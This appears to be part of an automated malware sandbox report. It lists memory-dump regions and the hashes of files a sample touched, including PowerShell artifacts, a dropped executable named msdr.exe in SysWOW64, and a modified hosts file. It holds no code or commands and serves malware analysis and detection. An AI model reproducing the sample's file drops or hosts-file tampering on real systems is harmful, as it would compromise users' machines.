SHA256 ea91b53fbe1f61c3d4e619baeeb3dec455db658c1e9c2c43df2a53d6772e81ba
SHA512 264f72b74cd4c97d2180b9830be6fa938bd036acc88b2e5792c26722729aa16bde4131c359743821d2e4712596e5f79d40ce8ff682c3b41223f296205fd419c1

memory/2932-24-0x0000000002B10000-0x0000000002B46000-memory.dmp

memory/2932-25-0x0000000005720000-0x0000000005D48000-memory.dmp

memory/2932-26-0x00000000056B0000-0x00000000056D2000-memory.dmp

memory/2932-27-0x0000000005DC0000-0x0000000005E26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4sclfqsp.kig.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2932-37-0x0000000005EA0000-0x00000000061F4000-memory.dmp

memory/2932-38-0x0000000006360000-0x000000000637E000-memory.dmp

memory/2932-39-0x0000000006490000-0x00000000064DC000-memory.dmp

memory/2932-50-0x000000006FC40000-0x000000006FC8C000-memory.dmp

memory/2932-60-0x00000000075F0000-0x000000000760E000-memory.dmp

memory/2932-49-0x00000000069D0000-0x0000000006A02000-memory.dmp

memory/2932-61-0x0000000007610000-0x00000000076B3000-memory.dmp

memory/2932-62-0x0000000007D80000-0x00000000083FA000-memory.dmp

memory/2932-63-0x0000000007740000-0x000000000775A000-memory.dmp

memory/2932-64-0x00000000077B0000-0x00000000077BA000-memory.dmp

memory/2932-65-0x00000000079C0000-0x0000000007A56000-memory.dmp

memory/2932-66-0x0000000007940000-0x0000000007951000-memory.dmp

memory/2932-67-0x0000000007970000-0x000000000797E000-memory.dmp

memory/2932-68-0x0000000007980000-0x0000000007994000-memory.dmp

memory/2932-69-0x0000000007A80000-0x0000000007A9A000-memory.dmp

memory/2932-70-0x0000000007A60000-0x0000000007A68000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cfbeb7aeaacdb2df4697e97900c8b1fc
SHA1 7223b8b88fe34b12f9fc9655efe862656a44d631
SHA256 8f0e2054d824ef6ae14943beb67fd9f4140679904d0130c6e43826b841ffd880
SHA512 2fc5f58117b23e69639c85b9b67714ec4a2bef3dc2b57dd0e70db4a04e7736c45aa0633b0b1ffb22509ba5d61eb04751ddcd64780cf7b7d896e4edd7e702b088

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 6195a91754effb4df74dbc72cdf4f7a6
SHA1 aba262f5726c6d77659fe0d3195e36a85046b427
SHA256 3254495a5513b37a2686a876d0040275414699e7ce760e7b5ee05e41a54b96f5
SHA512 ed723d15de267390dc93263538428e2c881be3494c996a810616b470d6df7d5acfcc8725687d5c50319ebef45caef44f769bfc32e0dc3abd249dacff4a12cc89

memory/2108-86-0x0000000005850000-0x0000000005BA4000-memory.dmp

memory/2108-88-0x0000000005EE0000-0x0000000005F2C000-memory.dmp

memory/4556-89-0x000000007436E000-0x000000007436F000-memory.dmp

C:\Windows\SysWOW64\msdr.exe

MD5 3974c5d0b92366bbc9af950c8d7f898d
SHA1 1b141b9cced64d1b86cd9d3460062ee7ecd34357
SHA256 c88dbfa8510ba03e204e2458434be95cb232f34a0b530a299ba6fdecd3c39820
SHA512 6b786fcf6ad40c3f8007e55242db7794f640177f3394a49a3ac9dc3b6cf3588eefe8e3db8ed21d9fcc3962de50d48c6c28867ab92a7da324389e19b9642170fa

memory/4556-93-0x0000000074360000-0x0000000074B10000-memory.dmp

memory/4556-94-0x0000000074360000-0x0000000074B10000-memory.dmp

memory/808-95-0x000001967B0B0000-0x000001967B0D2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c912e391446e515d41585b56d7f2feb0
SHA1 91f1c55bde31be771f6cfb49c23ab29faafc9454
SHA256 ca4b11488cf01f0e1909a65104c09f00dd450092885735d0e500a5f34f9b9ef7
SHA512 7f48e28addb5bce35510120794b719cceb45c11d35b597909d513804bf5d887d23405df28670c4e724e41338f17f2b6343bb14887bee1717892c84d6c965f595

memory/2328-112-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2328-114-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2328-115-0x00007FFCF9F50000-0x00007FFCFA145000-memory.dmp

memory/2328-117-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2328-116-0x00007FFCF9970000-0x00007FFCF9A2E000-memory.dmp

memory/424-138-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/1116-149-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/1324-166-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/1324-165-0x00000143ECA00000-0x00000143ECA2B000-memory.dmp

memory/1288-163-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/1288-162-0x000001662DAA0000-0x000001662DACB000-memory.dmp

memory/1236-158-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/1236-157-0x0000027425AE0000-0x0000027425B0B000-memory.dmp

memory/1204-155-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/1204-154-0x0000022E4AB50000-0x0000022E4AB7B000-memory.dmp

memory/1124-152-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/1124-151-0x000002173BD70000-0x000002173BD9B000-memory.dmp

memory/1116-148-0x0000023157B40000-0x0000023157B6B000-memory.dmp

memory/1032-146-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/1032-145-0x0000021A2ECD0000-0x0000021A2ECFB000-memory.dmp

memory/424-137-0x0000029C750E0000-0x0000029C7510B000-memory.dmp

memory/964-135-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/964-134-0x0000027C28300000-0x0000027C2832B000-memory.dmp

memory/380-131-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/380-130-0x0000021C612E0000-0x0000021C6130B000-memory.dmp

memory/668-126-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/668-125-0x00000171CE850000-0x00000171CE87B000-memory.dmp

memory/612-122-0x00007FFCB9FD0000-0x00007FFCB9FE0000-memory.dmp

memory/612-121-0x0000020E2F7F0000-0x0000020E2F81B000-memory.dmp

memory/612-120-0x0000020E2F7C0000-0x0000020E2F7E4000-memory.dmp

memory/2328-111-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2328-110-0x0000000140000000-0x000000014002B000-memory.dmp

memory/2328-109-0x0000000140000000-0x000000014002B000-memory.dmp

memory/640-403-0x0000021D70F80000-0x0000021D70F9C000-memory.dmp

memory/640-404-0x0000021D70FA0000-0x0000021D71055000-memory.dmp

memory/640-405-0x0000021D71060000-0x0000021D7106A000-memory.dmp

memory/640-406-0x0000021D711D0000-0x0000021D711EC000-memory.dmp

memory/640-407-0x0000021D711B0000-0x0000021D711BA000-memory.dmp

memory/640-408-0x0000021D71210000-0x0000021D7122A000-memory.dmp

memory/640-409-0x0000021D711C0000-0x0000021D711C8000-memory.dmp

memory/640-410-0x0000021D711F0000-0x0000021D711F6000-memory.dmp

memory/640-411-0x0000021D71200000-0x0000021D7120A000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

MD5 7087b454800d184148a99e967dea05dc
SHA1 b1c91c0dfb088444ff9d1e898e3f9c19ac593afe
SHA256 547af2de06c683da089bb0bd74790b6ea9ddae40916ec493823b5017a2c2c8fe
SHA512 f873d8c7c76a8eb0164b5217ea6269f1cb6f806d244a1585b3777e7b43c7db8dc6ac78c0457234fba22dc97a69f35181e858c52001f2a8a996e240913fac6815